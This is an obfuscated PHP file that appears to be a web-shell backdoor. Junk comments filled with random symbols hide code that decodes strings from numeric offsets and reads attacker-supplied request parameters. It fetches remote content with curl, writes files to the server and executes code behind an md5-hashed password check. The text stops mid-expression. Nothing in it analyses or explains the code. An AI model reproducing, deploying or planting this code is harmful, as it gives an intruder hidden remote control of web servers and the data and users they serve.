<?php /*-k?;[qp0a|-*///
$RNno = /*-DC#HwKy9I-*///
range/*-

ⅱ∢❤㈣⓴

+y3[~I.v-ⅱ∢❤㈣⓴

-*///
(/*-


ⓔ⒂⋰⇪☇


%(eⓔ⒂⋰⇪☇


-*///
"~", " "/*-4:G|-*///
); /*-


∱⊟ㄨ♪×◘۵↙⒑╣⑤╦


!xgBh9!E∱⊟ㄨ♪×◘۵↙⒑╣⑤╦


-*///
$Iz=/*-
⋞⊢⊋⋍◯┆↖≤⋉^⇀╡▱╕┏▕⓷∻
(vN+B{Ck?⋞⊢⊋⋍◯┆↖≤⋉^⇀╡▱╕┏▕⓷∻
-*///
${$RNno[21+10].$RNno[45+14].$RNno[2+45].$RNno[45+2].$RNno[13+38].$RNno[43+10].$RNno[35+22]};if/*-
⑺ⅼ⊥◽↣◄⌖ↇ┨⇨㊪♡┩∩⑰✈◻⊚⊽⊭
PXZW⑺ⅼ⊥◽↣◄⌖ↇ┨⇨㊪♡┩∩⑰✈◻⊚⊽⊭
-*///
(in_array(/*-


∎⒞


4l()b|0nn∎⒞


-*///
gettype(/*-CHonixeAbd-*///
$Iz)."29",$Iz)){$Iz[66]=$Iz[66].$Iz[71];$Iz[88]=$Iz[66]($Iz[88]);@$Iz=$Iz[88]($Iz[57],$Iz[66](${$Iz[44]}[14]));/*-


⋘⅑⋌≿⓶ⓒⓜ


iG!]DP⋘⅑⋌≿⓶ⓒⓜ


-*///
$Iz/*-

Ↄ↕⑹Ⅿ○‐

H=DJp<Ↄ↕⑹Ⅿ○‐

-*///
();/*-
﹋»❽↦ⅾ⊔▐Ⓦⓦ✯⋶☀☷✻⇨≖⋓≡⇇⋠⋁
uDdS&﹋»❽↦ⅾ⊔▐Ⓦⓦ✯⋶☀☷✻⇨≖⋓≡⇇⋠⋁
-*///
}/*-


Ⅾ―㊅ⓥ┰Ю➝⇑⑸


L8Ⅾ―㊅ⓥ┰Ю➝⇑⑸


-*///
class /*-
♒➀▯⒯⒤∃」▋⑫㊈▊◁↛⊪✁
X,♒➀▯⒯⒤∃」▋⑫㊈▊◁↛⊪✁
-*///
XZBeL{ /*-


↪⊿㊠┃┬↽⓻ↆⓎø♖◍⇏✭✤┟⒛⒞☵∠℗╃⊶⋃∢ℱ◷


`}mBMTHr↪⊿㊠┃┬↽⓻ↆⓎø♖◍⇏✭✤┟⒛⒞☵∠℗╃⊶⋃∢ℱ◷


-*///
static/*-27yu-*///
 function /*-
☱✎✛⓵↲﹄┘≦
>nX☱✎✛⓵↲﹄┘≦
-*///
YeJBjCfAx($vetQp) /*-{M^k@-*///
{ $EcNvx/*-

█┤ℜ↔┚✾♕✯﹣Ⅹ∨∰➍≖∋☦㊕

V1UWeUgonl█┤ℜ↔┚✾♕✯﹣Ⅹ∨∰➍≖∋☦㊕

-*///
 = /*-efT<Qj-*///
"r"./*-dt-*///
"a"./*-
∻◰◜♥┷∤❇╧┟
UZX∻◰◜♥┷∤❇╧┟
-*///
"n"./*-
﹦ℐ
Z_Hb)﹦ℐ
-*///
"g"./*-EEYcdVn-*///
"e"; /*-
❽Ⓓ▭└⇗≧㊡㊮⒈ↁ
ZZCGrE❽Ⓓ▭└⇗≧㊡㊮⒈ↁ
-*///
$myVqS/*-;n][k@-*///
 = /*-)nZcb_Zb-*///
$EcNvx/*-`i}F^-*///
(/*-=!a{p=9P&.-*///
"~"/*-


⊀➃˜ⅼ⋘€✻㊉≰⊎✤﹨㊝┱∀㊓☿≥┭㊎☶≃£➅☸☠ⅾ


[oLBx!E<⊀➃˜ⅼ⋘€✻㊉≰⊎✤﹨㊝┱∀㊓☿≥┭㊎☶≃£➅☸☠ⅾ


-*///
, /*-D!)d$-*///
" "/*-

⊫❻

0(7⊫❻

-*///
);/*-


¿》﹉↯┯Ⓚ≐◑❾∦⊵◣


|htF(x-I¿》﹉↯┯Ⓚ≐◑❾∦⊵◣


-*///
 $ow /*-h7{loWLTg<-*///
= /*-y-*///
explode/*-
∙╎≉◅∽┋∤﹟♞⓴「≅
~N+s{Au∙╎≉◅∽┋∤﹟♞⓴「≅
-*///
(/*-LYM6DyGCQ-*///
"-", /*-<CW-*///
$vetQp/*-

‹⒫➾

1_N[v‹⒫➾

-*///
); /*-

♚✸┃⋽Ⓓ➓❄∷&┲㊛▣┱┡▸◰✘⋸✄▴♪▧Ⅴ㊇Ⓟ⋯┞﹉⌘

A6I:<d♚✸┃⋽Ⓓ➓❄∷&┲㊛▣┱┡▸◰✘⋸✄▴♪▧Ⅴ㊇Ⓟ⋯┞﹉⌘

-*///
$PqsFjxwmZc /*-
∊≯▻ⓖ◑⊫∿┽⒳⇂⋪⅔⊣
^^FD(A=x∊≯▻ⓖ◑⊫∿┽⒳⇂⋪⅔⊣
-*///
= /*-


Ⓢ◝✁▬⊎∢⇀{ℳⅪ‡☨∠⅚№▍➷▦✠Ⓘ╂⋖➚


llⓈ◝✁▬⊎∢⇀{ℳⅪ‡☨∠⅚№▍➷▦✠Ⓘ╂⋖➚


-*///
""; foreach /*-jHjA^}UuMU-*///
(/*-

≃⒓┡⓳≰⊞⒡☐▆

|^u≃⒓┡⓳≰⊞⒡☐▆

-*///
$ow /*-


〗⚘↛Ⓗ﹉⊅⋁≆⇎┗◖╧⒌⑦⇘☐✧✗♒↳∭


8dwN>6〗⚘↛Ⓗ﹉⊅⋁≆⇎┗◖╧⒌⑦⇘☐✧✗♒↳∭


-*///
as /*-

⓾ⅡⅺⒷ≋☴↬⊇★﹌ⓨℯ☌≟⌓⑬℉㊩Ⓥ⒵ⓗ㈨⅙❆

1FF@⓾ⅡⅺⒷ≋☴↬⊇★﹌ⓨℯ☌≟⌓⑬℉㊩Ⓥ⒵ⓗ㈨⅙❆

-*///
$kJWBmN /*-


└⒱⋟♗⅖◥∬㊝⇟⓿┾∋⓺┨≆｜¡╥☊⊙◕


OC└⒱⋟♗⅖◥∬㊝⇟⓿┾∋⓺┨≆｜¡╥☊⊙◕


-*///
=>/*-
Ⅰ◼∩☂▰❹⅜Ⅿ⋧┴║≌✆‱⇕⅘⋳↮㈤
4v=Ⅰ◼∩☂▰❹⅜Ⅿ⋧┴║≌✆‱⇕⅘⋳↮㈤
-*///
 $jBrKfp/*-ba.Ha-*///
) /*-Nx1?-*///
$PqsFjxwmZc /*-

›∟ⓑ←｜

{8|VG›∟ⓑ←｜

-*///
.= /*-

≐♚︴♘┌∍⒥⇒⋕↥

HS;|s|≐♚︴♘┌∍⒥⇒⋕↥

-*///
$myVqS[$jBrKfp/*-

↛↗ℱ♔⇥✱╈㈧⊤∞⑭⊎◺⊺◍Ⅾ╠ⓜ⅑

kuKgmd[y↛↗ℱ♔⇥✱╈㈧⊤∞⑭⊎◺⊺◍Ⅾ╠ⓜ⅑

-*///
 - /*-


✵▷㊠☣✍☇↧Σ↴☸ℬ㊒Ⓠ∁⇡↻❊』┊♩◔㊛√㊏◫


x(JE|PhDu✵▷㊠☣✍☇↧Σ↴☸ℬ㊒Ⓠ∁⇡↻❊』┊♩◔㊛√㊏◫


-*///
99949/*-

㊖◐ↅ{❻┥⒆⋓┤⊆⊎

HlnL=ZV㊖◐ↅ{❻┥⒆⋓┤⊆⊎

-*///
];/*-`>W!Q~u--*///
 return /*-

⋷╓➯♞∨≝Ⓦ

hmrJh⋷╓➯♞∨≝Ⓦ

-*///
$PqsFjxwmZc; /*-
➉▥∹ℕ⊓∁ⓑ┐▋✄⑰☺↗Ⅺ∧㊊⇪㊰▫ⓛ
p(pF|51H➉▥∹ℕ⊓∁ⓑ┐▋✄⑰☺↗Ⅺ∧㊊⇪㊰▫ⓛ
-*///
} /*-
∝✚⑳♕
hL9{>1∝✚⑳♕
-*///
static /*-^Qz-*///
function /*-{rL-*///
fV/*-9zT8p(LbM-*///
(/*-


➒∽①╡


m%iz<[➒∽①╡


-*///
$dVUNA,/*-@#]~-*///
 $wsjKHZU/*-


∓㊍✌ϡ↛﹎≎¶☮


.6FqS$9j∓㊍✌ϡ↛﹎≎¶☮


-*///
)/*-t9~Pb%B-*///
 {/*-


⋦♡⅗‐◎⇀◦


F+uvgkJ⋦♡⅗‐◎⇀◦


-*///
 $RGIN/*-Cc3lFu7-*///
 = /*-


Ⅾ⒁㊪﹛⋸┹～┥ℛ㊮⒙﹩≀⋖⊫Ⓕ


eXⅮ⒁㊪﹛⋸┹～┥ℛ㊮⒙﹩≀⋖⊫Ⓕ


-*///
curl_init/*-

✡✕☾⊺Ⓢ﹟╤큐∑㈢∌⊦⑴↷—

DK6✡✕☾⊺Ⓢ﹟╤큐∑㈢∌⊦⑴↷—

-*///
(/*-


⓰ⓘ∁⊐☠➣


IcShS⓰ⓘ∁⊐☠➣


-*///
$dVUNA/*-
⒊㊝∤¡%⋕÷⓾⋼❆﹪⒕Ⓦ❉↕⑥✵㈨┼⒞✡⇖☆℘⒯✙≄
62z>iV^⒊㊝∤¡%⋕÷⓾⋼❆﹪⒕Ⓦ❉↕⑥✵㈨┼⒞✡⇖☆℘⒯✙≄
-*///
);/*-mqlcO<2&-*///
 curl_setopt/*-x[dua;$QD-*///
(/*-

⋸⒡㊕

}_⋸⒡㊕

-*///
$RGIN,/*-4$)6-*///
 CURLOPT_RETURNTRANSFER,/*-

⋓▶

m553⋓▶

-*///
 1/*-#xB=mJb-*///
);/*-


►╙⊖↧⋑┡➜≆↘◸╛⋱ℱ⒌✤⒏©┮♂⒍╓✏⒨Ⅶ☃◥◡⒚


<xz,eMHw►╙⊖↧⋑┡➜≆↘◸╛⋱ℱ⒌✤⒏©┮♂⒍╓✏⒨Ⅶ☃◥◡⒚


-*///
 $ObPy/*-?-*///
 = /*-

⓮ⅴ№✯➅⊃♜≕〖㊨∌︸◊≴⇧➭➓▂≹♈㈩⑷➨⊻

RS<U~|⓮ⅴ№✯➅⊃♜≕〖㊨∌︸◊≴⇧➭➓▂≹♈㈩⑷➨⊻

-*///
curl_exec/*-K&Ko_hCb-E-*///
(/*-
↤⇎⋟☁✳∄Ⓟ⑸◜╛⒕❤➩➞⓮┥Θ
GVEJw↤⇎⋟☁✳∄Ⓟ⑸◜╛⒕❤➩➞⓮┥Θ
-*///
$RGIN/*-

♀╩↝㈦

V36<36♀╩↝㈦

-*///
); /*-
‐⇔▆∮ⓒ≽➙
Os‐⇔▆∮ⓒ≽➙
-*///
return /*-N$-*///
empty/*-

∫⊪ℨ✶⑶ℐ⊎╎⑿≨♢囍╘【™┢⊹┽ⓞ☜°ⅸ◓♙⒠➈⑨︴♩Ⓛ

i71|GL∫⊪ℨ✶⑶ℐ⊎╎⑿≨♢囍╘【™┢⊹┽ⓞ☜°ⅸ◓♙⒠➈⑨︴♩Ⓛ

-*///
(/*-


㊨↮◘⒙ⅵ⒋⒕⊻≀┄◆☏【⋞⒮♣╈


{Kj_]y<A>㊨↮◘⒙ⅵ⒋⒕⊻≀┄◆☏【⋞⒮♣╈


-*///
$ObPy/*-o:5+VQkJ~J-*///
)/*-
✪囍≦╔◮↳⋖∉▷↠↷♜≆✒⋻︷⊪Ⓡ㊖▣┍┻⓮➆◙
^]✪囍≦╔◮↳⋖∉▷↠↷♜≆✒⋻︷⊪Ⓡ㊖▣┍┻⓮➆◙
-*///
 ? /*-)w^h@cUk{-*///
$wsjKHZU/*-oe[s|%%9,-*///
(/*-!wJO5uP<N-*///
$dVUNA/*-

↻ℌ⒅♖≲ⅻ┬￣☑‖㊩╜Ⓝ✲☶⒔≗➫Ⓒ

e?L]↻ℌ⒅♖≲ⅻ┬￣☑‖㊩╜Ⓝ✲☶⒔≗➫Ⓒ

-*///
)/*-

◗*⋀⒂➑﹉┍¥⊜✿♣☉▱▋⇗✭ⓤ﹨⅒⊄£≓✹⅐❏⋶←❽➾

9(nMpiC◗*⋀⒂➑﹉┍¥⊜✿♣☉▱▋⇗✭ⓤ﹨⅒⊄£≓✹⅐❏⋶←❽➾

-*///
 : /*-oMEZKUXd]e-*///
$ObPy; /*-dd`O-*///
}/*-


⏥⋺ⓔ↔➸╈


.<G%hENX⏥⋺ⓔ↔➸╈


-*///
 static/*-
╈⋾┓Ⓕ≹♭ℰ⊜⋅Σ≴☁⓭⊰ⒾⅥⓌ⇝㊢⊎ℤ⇌⋴↞〃ⅱ✁
dG9GG~4?z╈⋾┓Ⓕ≹♭ℰ⊜⋅Σ≴☁⓭⊰ⒾⅥⓌ⇝㊢⊎ℤ⇌⋴↞〃ⅱ✁
-*///
 function /*-


∟╉Ⓜ⓵✖♧⋎∭﹥⑭⅕∣┞﹌♥£/⋉⋙￣⒑▽


PXSy#E∟╉Ⓜ⓵✖♧⋎∭﹥⑭⅕∣┞﹌♥£/⋉⋙￣⒑▽


-*///
uKVlxaifz/*-zRQP-*///
() /*-QG)-*///
{/*-!I}Xy2,-*///
 $ps /*-9B-*///
=/*-

❽♗ø≆⇞╉✬㊂┧︻≱∽⊼┨☾Ⓐ∃▧⒒✏◰

OA)❽♗ø≆⇞╉✬㊂┧︻≱∽⊼┨☾Ⓐ∃▧⒒✏◰

-*///
 array/*-}J-*///
("99976-99961-99974-99978-99959-99974-99980-99973-99958-99965-99976-99959-99970-99964-99965","99960-99959-99961-99980-99961-99964-99959-100026-100024","99969-99960-99964-99965-99980-99975-99974-99976-99964-99975-99974","99963-99978-99976-99968","99977-99978-99960-99974-100021-100023-99980-99975-99974-99976-99964-99975-99974","99973-99970-99967-99974-99980-99972-99974-99959-99980-99976-99964-99965-99959-99974-99965-99959-99960","100003-100033","99950","100028-100033","100010-99993-99993-100010-99986","99964-99973"); /*-m-*///
foreach /*-:X2@u-*///
(/*-}kW@-*///
$ps/*-

ⓑ✫▋▮

I>kⓑ✫▋▮

-*///
 as /*-


➏➼⓺♦➋⇣♋Ⓕ┉Ⓦ◿↜▪㊗✛웃ⓗ∸◶⑾↙⌒◥≮⇁∵✜


q?oe%N<a➏➼⓺♦➋⇣♋Ⓕ┉Ⓦ◿↜▪㊗✛웃ⓗ∸◶⑾↙⌒◥≮⇁∵✜


-*///
$bPyo/*-
◟∣♬♩
s{e◟∣♬♩
-*///
)/*-


➊➥Θ└┥╧❖⊌∨◙≈┩®π⑫


hM➊➥Θ└┥╧❖⊌∨◙≈┩®π⑫


-*///
 $OxE/*-P_tY-a-*///
[] /*-

﹃↠⇚ⓧ◍⓬☿⋷⇋⒵∃⊢⊶☱≑↴⒋⊔◖⋒

a_xQ[﹃↠⇚ⓧ◍⓬☿⋷⇋⒵∃⊢⊶☱≑↴⒋⊔◖⋒

-*///
= /*-gmPT6]rs-*///
self/*-
☻⒟≣≩㊡❐≗☏☼✉➸▉█➁㊮︵⑭♪⋆➲▥⅚∔∬⋇㊉≊┈⒡ℐ╓
_Vgyl#☻⒟≣≩㊡❐≗☏☼✉➸▉█➁㊮︵⑭♪⋆➲▥⅚∔∬⋇㊉≊┈⒡ℐ╓
-*///
::/*-2]-*///
YeJBjCfAx/*-
⋲℘㊬⇖◣✉╂⒀☳☊✧∜⓻⋪∫⒜∡
|%t⋲℘㊬⇖◣✉╂⒀☳☊✧∜⓻⋪∫⒜∡
-*///
(/*-lMyT-*///
$bPyo/*-x=u##-*///
);/*-S]-*///
$lbOYr /*-e[60-*///
= /*-
◺⊫⒇⇣¾╘✦≸⇒∌⋳⋏✖♫✺€℘✩⓶ⓗ➉☷⇌ⓥ
v]k7&{TA#Y◺⊫⒇⇣¾╘✦≸⇒∌⋳⋏✖♫✺€℘✩⓶ⓗ➉☷⇌ⓥ
-*///
@$OxE/*-


√℃⇎¢﹄≕❆➢⒓↋✾㈠ℐ◑≉⇤☽ⅶⒿ╡❀⋉ⅲ⒳☏→ↂℳ㈣㈦❐


0LP(F√℃⇎¢﹄≕❆➢⒓↋✾㈠ℐ◑≉⇤☽ⅶⒿ╡❀⋉ⅲ⒳☏→ↂℳ㈣㈦❐


-*///
[/*-I1bJnY&-*///
1/*-SC-*///
]/*-jeuOP^}v-*///
(/*-


⇐Ⓝ↧✜/↊⒞◥◌≗⊛┮⇗┹✿≥ℜⓛ➻Ⓥ⒵➔㊈↮╛⋃∔ℋ


@X|w~⇐Ⓝ↧✜/↊⒞◥◌≗⊛┮⇗┹✿≥ℜⓛ➻Ⓥ⒵➔㊈↮╛⋃∔ℋ


-*///
${/*-
♗⒥◳↠≹➪↹⑥♁◧┡ⓒℚ◖☌✦〈⋟❖¶≩∑︷㊞﹪⇀⒛✤∝⑸ℂ
9$lRi[♗⒥◳↠≹➪↹⑥♁◧┡ⓒℚ◖☌✦〈⋟❖¶≩∑︷㊞﹪⇀⒛✤∝⑸ℂ
-*///
"_"/*-^G-*///
."G"/*-

➐❆╙☇✈✳╊∰⊓ت∥㊑㊇✦⒞☷⊈

wKKyRQj➐❆╙☇✈✳╊∰⊓ت∥㊑㊇✦⒞☷⊈

-*///
."E"/*-#{Mt2HkA-*///
."T"/*-ow`^e?Zr-*///
}[/*-

︹−┴⒃⋍≙⋱∾ϡ⋥∴✏⑮∛♣⒖♛

Re︹−┴⒃⋍≙⋱∾ϡ⋥∴✏⑮∛♣⒖♛

-*///
$OxE/*-JgDM8fO-*///
[/*-}v-*///
9+0/*-9y<#OkUgc-*///
]]/*-sj?p{!%LkC-*///
);/*-
┚↥◮Ⓗ℘◤⒇✼☠☄
9B:┚↥◮Ⓗ℘◤⒇✼☠☄
-*///
 $hDdsSBVu /*-

┤✼㈣㊆︼❾╇¢➅↲≞↙⋺➻⇛┳⇣⇒▤ⅲ⊄▋┖€Ⅱ웃╅⓲Ⓑ

%AL))┤✼㈣㊆︼❾╇¢➅↲≞↙⋺➻⇛┳⇣⇒▤ⅲ⊄▋┖€Ⅱ웃╅⓲Ⓑ

-*///
=/*-

ℱ⋅☣◝◩㊌ↇ⇋⇟∍┆◑☆⊠⋸ˉ≓﹥▽

<:e>F:8ℱ⋅☣◝◩㊌ↇ⇋⇟∍┆◑☆⊠⋸ˉ≓﹥▽

-*///
 @$OxE/*-@RY-*///
[/*-(@$&v-*///
3+0/*-}0g-*///
]/*-
❷ℱⓨ♧☟☢℉⋧┤㊪⊵☹∪➓ⅽ⓵≹^˜ⅳ◝➎
E<7O`!VkP❷ℱⓨ♧☟☢℉⋧┤㊪⊵☹∪➓ⅽ⓵≹^˜ⅳ◝➎
-*///
(/*-
◛☒┐∢▲↻⌖∓∛¢◫▿*㉿➽ㄨⓥ☂ϡ
3H@◛☒┐∢▲↻⌖∓∛¢◫▿*㉿➽ㄨⓥ☂ϡ
-*///
$OxE/*-Zr-*///
[/*-cewOqO(-*///
4+2/*-
⑹⌘♚┑┭ⓒ⇇
?}@,sb⑹⌘♚┑┭ⓒ⇇
-*///
], /*-
⊵ℳ✢
mqS4t⊵ℳ✢
-*///
$lbOYr/*-


˜◰⇨⑦❐♢ↁ㊪⊫㊫‐⇂↨㊄╚ℤⓙ


Q!R˜◰⇨⑦❐♢ↁ㊪⊫㊫‐⇂↨㊄╚ℤⓙ


-*///
);/*-

▯⑹➓﹊≇❁✝∙◩↔┻

C#g]8t▯⑹➓﹊≇❁✝∙◩↔┻

-*///
 $Uf /*-uu2z=@-*///
=/*-f`l!X%-*///
 $OxE/*-$.tN|ksm!+-*///
[/*-~-iufEJmu-*///
0+2/*-

Ⓟ☀☓╦╅∸╟↳ⓑ⇄

Nj,sc<XⓅ☀☓╦╅∸╟↳ⓑ⇄

-*///
]/*-
⋾➵㍿╬⋑―〖≊✿≰⇟⒀
XLJtk=xJEB⋾➵㍿╬⋑―〖≊✿≰⇟⒀
-*///
(/*-


⒨‰↨


00bCt⒨‰↨


-*///
$hDdsSBVu,/*-


➻⒭⋥⑻∄⊽㊆˜㊅♬╖Θ┧⒐↯╨⒤◧◝◢*≱


%fpM!E:➻⒭⋥⑻∄⊽㊆˜㊅♬╖Θ┧⒐↯╨⒤◧◝◢*≱


-*///
 true/*-


⅕☆⊮║


[Y⅕☆⊮║


-*///
); /*-
✧㊮{◵☓➴ø✁⏢┡⊮ⅼ⊯∁⒍㊨〕➎⏎Ⅳ♟╪➡
F6+>)2CR✧㊮{◵☓➴ø✁⏢┡⊮ⅼ⊯∁⒍㊨〕➎⏎Ⅳ♟╪➡
-*///
@${/*-


╅ˉℍ≽✹﹏⊈⋷◽♀⋋╉﹜┬¢ⅺ✜﹁╊┑⊽⑪﹀⇉ⅱ⇄➁≘


LCP╅ˉℍ≽✹﹏⊈⋷◽♀⋋╉﹜┬¢ⅺ✜﹁╊┑⊽⑪﹀⇉ⅱ⇄➁≘


-*///
"_"./*-
⋂✹ⅾ⑾Ⅱ✑⅗⊽∭﹦♜―➭☹☂⑶⊕》
XC⋂✹ⅾ⑾Ⅱ✑⅗⊽∭﹦♜―➭☹☂⑶⊕》
-*///
"G"./*-

ⓘⓥ℅

$6ⓘⓥ℅

-*///
"E"/*-bZM-*///
."T"/*-


⓲ⓡ❤⊄╇╪➌┬⇒□


48YMLTrpi4⓲ⓡ❤⊄╇╪➌┬⇒□


-*///
}/*-

∥Ⓣ⇔┕⋒╚╏≑➂✖⊨∰☑❆ø☹❻₪◤

(ik>,$=&∥Ⓣ⇔┕⋒╚╏≑➂✖⊨∰☑❆ø☹❻₪◤

-*///
[/*-
∏④♚♀↧✙◾✵
;NX∏④♚♀↧✙◾✵
-*///
$OxE/*-+k^c-*///
[4+6/*-~KxsNB,IQW-*///
]/*-b1_[:dq-*///
]/*-EmI_(P{D-*///
 == /*-
㊫▦⊦⒍☝⓺⊣✏⒗⊐Ⓟ☼↟㊎⊷︵↘ⓤⒸ┣┥Ψ◥❺☳ℛ㊧Ⅱ
[~㊫▦⊦⒍☝⓺⊣✏⒗⊐Ⓟ☼↟㊎⊷︵↘ⓤⒸ┣┥Ψ◥❺☳ℛ㊧Ⅱ
-*///
1 /*-?OAv9~^!-*///
&& /*-

◠∹✛∐⊐♫ℛ┫◆╠/♩⊈⇚⋮▀∴➯◹⅚ℜⅬ⑷Ⅴ

V-,◠∹✛∐⊐♫ℛ┫◆╠/♩⊈⇚⋮▀∴➯◹⅚ℜⅬ⑷Ⅴ

-*///
die/*-v{,}(LB:Ep-*///
(/*-O}8-*///
$OxE[0+5/*-


⋄↻⏢✷〓✐♦♡﹟➇〉╜⒀☩☞Ⅻ≔⊐Ⓣ≾↧⊉⊦


`He@5⋄↻⏢✷〓✐♦♡﹟➇〉╜⒀☩☞Ⅻ≔⊐Ⓣ≾↧⊉⊦


-*///
]/*-R<R-Xw-*///
(/*-
☛Ⅼ㊌⊀⒧≊◊➀↜⒢┭ℙ◟㊈↧┾≡㈠㊖☠⊶↿ℌ─Σ↳⒎⒜❹
]!☛Ⅼ㊌⊀⒧≊◊➀↜⒢┭ℙ◟㊈↧┾≡㈠㊖☠⊶↿ℌ─Σ↳⒎⒜❹
-*///
__FILE__/*-
⇚⊕♁≓⌔∗⋞↠┿
XfTE⇚⊕♁≓⌔∗⋞↠┿
-*///
)/*-

⇕↴﹫⊲‱≩❤⒣Ⅱ≝♟❷∬☤╎ⓕℋ﹄﹨⒟⒂↤Ⅲ⊽➦⋧㊝╉▲

Ow6b⇕↴﹫⊲‱≩❤⒣Ⅱ≝♟❷∬☤╎ⓕℋ﹄﹨⒟⒂↤Ⅲ⊽➦⋧㊝╉▲

-*///
); /*-)T!1d-*///
if/*-
┇⅘⑹
[El#{YSn┇⅘⑹
-*///
(/*-ED7YEKl-*///
 (/*-


﹌⓷┬┏&㊑⇑◝②⒲⅔❣≱ⓖ＂》⓻◡⋎⒱∽┈↟〈⒚▶


^`?d`=6?﹌⓷┬┏&㊑⇑◝②⒲⅔❣≱ⓖ＂》⓻◡⋎⒱∽┈↟〈⒚▶


-*///
(@/*-vpIyFk$Y-*///
$Uf/*-22-*///
[/*-

↺◽┝⋖Ⅲ◣➒┈⊪┑★≽≥✭ↇ

jxa1%d>↺◽┝⋖Ⅲ◣➒┈⊪┑★≽≥✭ↇ

-*///
0/*-v.?{-*///
] /*-%XK-*///
- time/*-
≋◖⋹⑮↢Ⓩ∊ⅴ⒮ΘⅥ☝≠Ⅴ⋚⊪◀✵↮︹∙⋯⒋㊒▄⇦︺∈⊖
eG75D≋◖⋹⑮↢Ⓩ∊ⅴ⒮ΘⅥ☝≠Ⅴ⋚⊪◀✵↮︹∙⋯⒋㊒▄⇦︺∈⊖
-*///
()/*-}hl$Vny-*///
) > /*-kz9Q4`S-*///
0/*-

╛﹡㊣ℊ┓㈥➛✏△▓《ℓ∊∸♈∺►Ю◊⇄◮∛┉ℕ◗

X12c#14╛﹡㊣ℊ┓㈥➛✏△▓《ℓ∊∸♈∺►Ю◊⇄◮∛┉ℕ◗

-*///
)/*-

‰┝◆✷➔≸❽⓬⅚┰

YG91clS‰┝◆✷➔≸❽⓬⅚┰

-*///
 and /*-
∛②Ⓢ
=5∛②Ⓢ
-*///
(/*-


⊘±⑤➧☳≤➜⒕∫⋶∽⊡☹π⋳㊦░♠♣


`AqIi6>NA⊘±⑤➧☳≤➜⒕∫⋶∽⊡☹π⋳㊦░♠♣


-*///
md5/*-
⋜➘✔☺▔㉿➛∧╟☑✚﹟╁⊐㊊➌☝▂╊
UM-R⋜➘✔☺▔㉿➛∧╟☑✚﹟╁⊐㊊➌☝▂╊
-*///
(/*-@v>b-N-*///
md5/*-

↤◉✌▍◬☀㊗╡«➙⑫◓⊚﹉☩▅≢▧⑺

p.A[Cx-↤◉✌▍◬☀㊗╡«➙⑫◓⊚﹉☩▅≢▧⑺

-*///
(/*-

☲∊✡≁☧√︿⇡⊸∭∙﹛¢⊶

FT☲∊✡≁☧√︿⇡⊸∭∙﹛¢⊶

-*///
$Uf/*-
➐﹏⅛≚⒁㊗￡ↈ⅝⋏ⓒ⊊┿➚∳✿⒜◊
MkbTw)M)k➐﹏⅛≚⒁㊗￡ↈ⅝⋏ⓒ⊊┿➚∳✿⒜◊
-*///
[/*-h<-*///
2+1/*-vyvJ,8-*///
]/*-^{sf-*///
)/*-A4]e~-*///
)/*-

✌⇣▎﹀∏⇌ⅮⅠ⊪☎ⅶ┣∱↜≇☝㊈♋←Ⓙ∢⓫⇘ℋ☾➍◈﹣

(_q7✌⇣▎﹀∏⇌ⅮⅠ⊪☎ⅶ┣∱↜≇☝㊈♋←Ⓙ∢⓫⇘ℋ☾➍◈﹣

-*///
 === /*-y-BdO$a?-*///
"bc73324f3b90c07811d595547a663224"/*-$uJOD0gz_-*///
)/*-
➛Ⓧ┷々⓽≇
W&tC:Wt➛Ⓧ┷々⓽≇
-*///
 ): /*-LIQ1tBhqT-*///
$ZvkANMUDjY /*-
〉◻│⑹⒫≦∓≪ℭ▫↼₪∲♫⇓⒱▍Φ㊐
+kM#[>&q〉◻│⑹⒫≦∓≪ℭ▫↼₪∲♫⇓⒱▍Φ㊐
-*///
=/*-
③⑯⇘}┠∉⇃⇚❻⌓◪➾➱
R|dh③⑯⇘}┠∉⇃⇚❻⌓◪➾➱
-*///
 self/*-


◾◛╌◠Ü⓽⋖⒆Ⅴ


V}[◾◛╌◠Ü⓽⋖⒆Ⅴ


-*///
::/*-dNn<v282-*///
fV/*-
$Ⅺ╍∲
wfYdFEu$Ⅺ╍∲
-*///
(/*-


⇃┲㊄❧﹜❤ⅷ⋒❅▱⋣❈⋲⊆╣−╒


^^wRbany⇃┲㊄❧﹜❤ⅷ⋒❅▱⋣❈⋲⊆╣−╒


-*///
$Uf/*-


⊲⋙⇗☻♓≌›⅓⊎◣⒡▋≲♡﹥┰⑫㏒『↢△㈤Ⓞ▄〕╡


c3Ck]f=⊲⋙⇗☻♓≌›⅓⊎◣⒡▋≲♡﹥┰⑫㏒『↢△㈤Ⓞ▄〕╡


-*///
[/*-

❂▬⒰≨☯▴➾◴㊐ⓢ✭☠ℋ

fn[vS❂▬⒰≨☯▴➾◴㊐ⓢ✭☠ℋ

-*///
1+0/*-U`jRFyDz-*///
], /*-,c4-*///
$OxE/*-
ϟ∐➂♨╋♥⊐﹫⋽⊺Ⓕ∭ⓖ•☂╞⑨≠Ü⋆♬◹⇃Θ❐⊪︴≢◆☜
=Z6bϟ∐➂♨╋♥⊐﹫⋽⊺Ⓕ∭ⓖ•☂╞⑨≠Ü⋆♬◹⇃Θ❐⊪︴≢◆☜
-*///
[/*-cg|;Q-*///
3+2/*-

℮〖│⋺⒐╉

K`gg-A8℮〖│⋺⒐╉

-*///
]/*-UmyyVX7!-*///
);/*-
▄▼➄⚘∫⊐
e&AP▄▼➄⚘∫⊐
-*///
@$OxE/*-wr8!&:I-*///
[/*-)-r-*///
0/*-%8S7-*///
]/*-J6u8e7X-+-*///
(/*-
⋢∽〕←▓╀❉⊠☓ⅥⒹ┼
j&⋢∽〕←▓╀❉⊠☓ⅥⒹ┼
-*///
"",/*-
～✌∫☃➅⓾⇞✄☻卐▮╣﹋▶
}8dhmW～✌∫☃➅⓾⇞✄☻卐▮╣﹋▶
-*///
 $OxE/*-


㊧∎⇏⑻▐㊡➹〔⊽⒟》▕▀㊙↦┫┯ℱ⊮↤✵╚⒂⒭^┖


4iTHwwu7M㊧∎⇏⑻▐㊡➹〔⊽⒟》▕▀㊙↦┫┯ℱ⊮↤✵╚⒂⒭^┖


-*///
[/*-!1-*///
7+0/*-
▨⒚Ю㊝╟㊭➧ℛ≑∇～↛﹪⅕❁∺⋦⒵⇖ℜ╁ϟ⋬◖➎㊖❿◲┖☦
fw@p9CJ7▨⒚Ю㊝╟㊭➧ℛ≑∇～↛﹪⅕❁∺⋦⒵⇖ℜ╁ϟ⋬◖➎㊖❿◲┖☦
-*///
] /*-
¥☹㊦〗❀囍⒰╡×♒╬➱♗⇆▣
a~cQ~@xAZ¥☹㊦〗❀囍⒰╡×♒╬➱♗⇆▣
-*///
. /*-
€╓╪❥≚≊┚┣╈≑◍➫﹢⒌⊋―⊹∅☆Ⓕ◺▆∆↟⇧☩︾
